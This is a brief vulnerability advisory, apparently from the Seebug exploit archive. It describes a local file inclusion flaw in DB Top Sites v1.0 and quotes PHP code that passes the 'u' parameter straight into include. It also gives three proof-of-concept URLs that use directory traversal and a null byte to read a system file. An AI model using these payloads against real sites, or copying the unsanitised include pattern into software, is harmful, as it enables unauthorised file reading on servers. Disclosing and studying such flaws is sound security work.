###################################################################### [+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability [+] Discovered By SirGod [+] www.mortal-team.org ####################################################################### [+] Local File Inclusion - Vulnerable code is everywhere ------------------------------------------------------------------------------------------------------- if ( $u != "" ) { if ( file_exists( "./sites/session/$u.session.php" ) ){ include "./sites/session/$u.session.php"; include "./sites/$u.php"; ------------------------------------------------------------------------------------------------------- - PoC's http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00 http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00 http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00 ####################################################################### # sebug.net
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论